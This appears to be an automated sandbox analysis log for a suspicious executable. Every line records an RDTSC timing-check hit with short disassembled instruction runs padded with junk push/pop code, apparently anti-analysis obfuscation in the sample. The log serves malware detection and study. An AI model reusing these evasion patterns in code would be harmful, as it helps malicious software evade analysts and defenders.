Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 945241 second address: 945247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 954165 second address: 954169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 954169 second address: 95416D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95416D second address: 954190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F88FCB145C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007F88FCB145CCh 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 952004 second address: 95200E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88FCAE4296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 952176 second address: 95217C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9522E2 second address: 9522F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCAE429Ch 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 952435 second address: 95246B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F88FCB145CDh 0x0000000f jmp 00007F88FCB145D4h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95246B second address: 952473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95260D second address: 95262F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007F88FCB145C6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95262F second address: 952634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 952634 second address: 95264D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCB145D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95264D second address: 95265E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F88FCAE4296h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9527A4 second address: 9527AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9527AB second address: 9527B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007F88FCAE429Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 952A8E second address: 952A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 952C1E second address: 952C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCAE429Ch 0x00000009 popad 0x0000000a jp 00007F88FCAE429Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b jmp 00007F88FCAE429Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 953195 second address: 9531AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F88FCB145C6h 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F88FCB145CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9531AB second address: 9531AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91CE6A second address: 91CE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F88FCB145CBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 91CE7D second address: 91CE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 jo 00007F88FCAE42B3h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95AA19 second address: 95AA39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F88FCB145CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95AA39 second address: 95AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95AA3D second address: 95AA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95AA43 second address: 95AA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95AE95 second address: 95AEB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9598DE second address: 9598FD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F88FCAE429Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jo 00007F88FCAE4296h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95B0B1 second address: 95B0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 95B0B7 second address: 95B0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96194E second address: 96196E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F88FCB145D0h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F88FCB145C6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 960E42 second address: 960E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCAE429Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 960E57 second address: 960E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 960E61 second address: 960EA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F88FCAE4296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jp 00007F88FCAE4296h 0x0000001a jmp 00007F88FCAE42A7h 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F88FCAE4296h 0x00000028 js 00007F88FCAE4296h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 960EA1 second address: 960EB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96150F second address: 961513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964EA3 second address: 964EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964EA9 second address: 964EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964EAD second address: 964EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964EBC second address: 964EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964EC1 second address: 964ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 964ECB second address: 964F1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCAE429Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 ja 00007F88FCAE4298h 0x00000016 pop eax 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F88FCAE4298h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push E29EBE14h 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jns 00007F88FCAE4296h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965355 second address: 965359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965359 second address: 96535D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96551A second address: 965536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F88FCB145C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jo 00007F88FCB145C8h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965536 second address: 96553A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965629 second address: 96562D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96562D second address: 965633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965AED second address: 965AF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965AF3 second address: 965AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965C01 second address: 965C1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F88FCB145C8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965C1E second address: 965C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965D06 second address: 965D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 965D0A second address: 965D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 966052 second address: 966056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 966056 second address: 96605C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96605C second address: 966067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F88FCB145C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 966067 second address: 966073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 966073 second address: 966099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F88FCB145C8h 0x0000000b popad 0x0000000c nop 0x0000000d or si, 8F70h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 jnc 00007F88FCB145CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 966099 second address: 96609D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9665E2 second address: 966649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007F88FCB145D0h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F88FCB145C8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 cmc 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F88FCB145C8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push 00000000h 0x00000047 add edi, dword ptr [ebp+12A71C0Eh] 0x0000004d push eax 0x0000004e push edi 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 967FEA second address: 967FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9693A6 second address: 9693B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88FCB145CDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96A21B second address: 96A21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 969FA8 second address: 969FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88FCB145CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96A21F second address: 96A223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9693B8 second address: 9693DD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88FCB145DAh 0x00000008 jmp 00007F88FCB145D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96A223 second address: 96A22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 9693DD second address: 9693E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96A22D second address: 96A231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96ADC8 second address: 96AE4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F88FCB145D6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F88FCB145DCh 0x00000014 jmp 00007F88FCB145D6h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F88FCB145C8h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 push ecx 0x00000037 xor dword ptr [ebp+12C17DB9h], ecx 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 add dword ptr [ebp+12A728C7h], edx 0x00000046 xchg eax, ebx 0x00000047 push ecx 0x00000048 jnp 00007F88FCB145C8h 0x0000004e push edi 0x0000004f pop edi 0x00000050 pop ecx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ebx 0x00000055 je 00007F88FCB145C6h 0x0000005b pop ebx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DDB4 second address: 96DDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DDBB second address: 96DDC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F88FCB145C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DDC5 second address: 96DE24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+12A71ABBh], esi 0x0000000f push 00000000h 0x00000011 add edi, 26B188CCh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F88FCAE4298h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+12A73313h], edx 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F88FCAE42A7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DE24 second address: 96DE28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DE28 second address: 96DE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DE2E second address: 96DE34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96FE1F second address: 96FE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 970DFB second address: 970E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88FCB145CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 971E73 second address: 971E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 971E79 second address: 971E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88FCB145CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 972DFF second address: 972E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 972E05 second address: 972E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 977DB0 second address: 977E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F88FCAE4296h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f add dword ptr [ebp+12A725CFh], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F88FCAE4298h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 push ebx 0x00000032 jng 00007F88FCAE429Ch 0x00000038 mov dword ptr [ebp+12A72F0Bh], edi 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 xor dword ptr [ebp+12A71849h], edx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F88FCAE429Ch 0x00000050 jmp 00007F88FCAE429Dh 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 96DFA3 second address: 96DFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	RDTSC instruction interceptor: First address: 971031 second address: 971035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
